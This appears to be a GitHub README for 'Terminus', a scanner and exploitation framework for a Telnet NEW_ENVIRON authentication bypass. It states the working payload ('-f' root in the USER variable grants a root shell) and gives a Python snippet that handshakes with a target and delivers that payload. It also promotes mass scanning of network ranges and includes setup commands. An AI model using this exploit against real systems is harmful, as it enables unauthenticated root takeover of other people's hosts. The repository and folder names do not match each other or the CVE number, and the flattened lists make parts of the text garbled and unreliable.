
AsyncIO Scanner & Exploitation Framework for CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Features high-concurrency discovery, passive fingerprinting, and authorized root shell escalation
A security analysis engine for CVE-2026-24061 Telnet NEW_ENVIRON authentication bypass and privilege escalation vulnerability.

Terminus is a professional security research tool designed for authorized penetration testing and vulnerability assessment of CVE-2026-24061. This critical vulnerability affects legacy Telnet daemon implementations, allowing unauthenticated remote attackers to bypass authentication and gain root-level access.
CVE-2026-24061 is a Remote Code Execution vulnerability in Telnet services that support RFC 1572 (Telnet Environment Option). The vulnerability exploits improper sanitization of the USER environment variable during NEW_ENVIRON subnegotiation:
USER=john → prompts for passwordUSER=-f root → bypasses authentication, grants root shellImpact:
Affected Services:
192.168.0.0/24, 10.0.0.0/8)--verify): Proof-of-exploit, confirms uid=0 root accessTerminus.handshake() - RFC 854 compliant handshakeTerminus.exploit() - CVE-2026-24061 payload delivery--exploit flagThe heart of Terminus is the TerminusNegotiator class, which provides a clean separation between protocol handling and exploitation logic:
from terminus import TerminusNegotiator
# Initialize engine
negotiator = TerminusNegotiator()
# Step 1: RFC 854 compliant handshake
await negotiator.handshake(target="192.168.1.100", port=23)
# Step 2: Deliver CVE-2026-24061 payload
result = await negotiator.exploit(payload="-f root")
if result.success:
print(f"Root shell acquired: {result.evidence['uid']}")
Traditional scripts (existing tools):
Target → Raw Socket → Payload → Blind Execution → Hope for Shell
Terminus engine:
Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment
↓
[Optional] Verified Exploitation → Evidence Collection → Report
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
# Run setup script
.\setup_env.ps1
# Activate virtual environment
.venv\Scripts\Activate.ps1
# Verify installation
terminus --version
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terminus-CVE-2025-2406
# Run setup script
chmod +x setup_env.sh
./setup_env.sh